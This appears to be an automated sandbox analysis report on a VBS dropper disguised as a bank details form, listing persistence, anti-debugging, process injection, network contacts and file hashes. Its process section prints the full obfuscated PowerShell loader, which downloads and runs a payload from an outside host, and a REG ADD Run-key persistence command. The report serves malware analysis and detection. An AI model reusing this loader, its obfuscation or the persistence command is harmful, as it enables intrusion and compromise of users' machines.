N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" C:\Windows\SysWOW64\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4432 set thread context of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4652 wrote to memory of 4432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 4556 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4432 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 5008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5008 wrote to memory of 228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bank_Details_Form.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 98.58.21.103.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4652-0-0x00007FFE62483000-0x00007FFE62485000-memory.dmp

memory/4652-6-0x000001F8FE870000-0x000001F8FE892000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prbo505p.ofd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4652-11-0x00007FFE62480000-0x00007FFE62F41000-memory.dmp

memory/4652-12-0x00007FFE62480000-0x00007FFE62F41000-memory.dmp

memory/4432-15-0x0000000002630000-0x0000000002666000-memory.dmp

memory/4432-16-0x0000000005280000-0x00000000058A8000-memory.dmp

memory/4432-17-0x0000000004FE0000-0x0000000005002000-memory.dmp

memory/4432-18-0x00000000058B0000-0x0000000005916000-memory.dmp

memory/4432-19-0x00000000051F0000-0x0000000005256000-memory.dmp

memory/4432-29-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/4432-30-0x0000000005F60000-0x0000000005F7E000-memory.dmp

memory/4432-31-0x0000000005FA0000-0x0000000005FEC000-memory.dmp

memory/4432-32-0x00000000077B0000-0x0000000007E2A000-memory.dmp

memory/4432-33-0x0000000006500000-0x000000000651A000-memory.dmp

memory/4432-35-0x00000000071A0000-0x00000000071C2000-memory.dmp

memory/4432-34-0x0000000007210000-0x00000000072A6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Skrmet.Kli

MD5 9916e5a5f7afe8c1f861f93999a875f3
SHA1 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

memory/4432-36-0x00000000083E0000-0x0000000008984000-memory.dmp

memory/4432-38-0x0000000008990000-0x000000000C5EC000-memory.dmp

memory/4652-39-0x00007FFE62480000-0x00007FFE62F41000-memory.dmp

memory/4652-40-0x00007FFE62483000-0x00007FFE62485000-memory.dmp

memory/2976-46-0x0000000000AD0000-0x0000000000B10000-memory.dmp

memory/2976-45-0x0000000000AD0000-0x0000000001D24000-memory.dmp

memory/4652-49-0x00007FFE62480000-0x00007FFE62F41000-memory.dmp

memory/2976-50-0x0000000023F70000-0x0000000023FC0000-memory.dmp

memory/2976-51-0x0000000024670000-0x0000000024702000-memory.dmp

memory/2976-52-0x0000000024010000-0x000000002401A000-memory.dmp